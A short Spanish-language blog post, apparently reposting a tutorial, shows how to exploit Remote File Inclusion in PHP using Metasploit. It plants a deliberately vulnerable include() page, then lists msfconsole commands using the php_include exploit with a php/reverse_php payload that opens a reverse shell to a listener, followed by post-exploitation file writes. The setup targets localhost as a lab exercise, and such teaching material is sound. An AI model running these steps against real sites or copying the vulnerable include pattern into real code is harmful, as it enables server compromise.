Hoy en blackploit.com han publicado un mas que interesante tutorial sobre la explotación de RFI utilizando Metasploit.
RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos – vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la funcióninclude().
Lo primero es simplemente ir a la carpeta /var/www/html para editar el archivo index.php
cd /var/www/html
mkdir 1
vi 1/index.php
Se agrega al archivo index.php el pedazo de código vulnerable:
<?php
$color
=
'blue'
;
if
(isset(
$_GET
[
'COLOR'
]))
$color
=
$_GET
[
'COLOR'
];
require
(
$color
.
'.php'
);
?>
también puede ser este:
<?php
$color
=
'blue'
;
if
(isset(
$_GET
[
'COLOR'
] ) )
$color
=
$_GET
[
'COLOR'
];
include
(
$color
.
'.php'
);
?>
De aquí en adelante pongo el comando y al lado entre corchetes [] la explicación:
chown apache:apache -R 1 [Cambia el propietario del fichero "1" al servicio Apache]
msfconsole [Echa a andar la consola de MSF]
use unix/webapp/php_include [Exploit que se va usar]
set PATH/1/ [El Path, subdominio o carpeta donde esta la Uri]
set PHPURI /index.php?COLOR=XXpathXX [Se define la Uri vulnerable y la variable donde se explota (XXpathXX)]
set RHOST localhost [IP o host del objetivo]
set PAYLOAD php/reverse_php [Elegimos un Payload]
set LHOST 172.16.61.132 [IP donde se conectará la víctima]
exploit [Echa a andar el exploit]
dir [Mira archivos en el directorio]
touch test.txt [Crea un archivo llamado test.txt]
echo Owned > test.txt [Escribe Owned dentro de test.txt]
[+] Eso era todo
[+] El vídeo lo saqué de http://www.securitytube.net/
[+] Si me equivoco en algo me avisan (no soy perfecto XD)
[+] Salu2
[+] ZioneR
Visto en: blackploit.com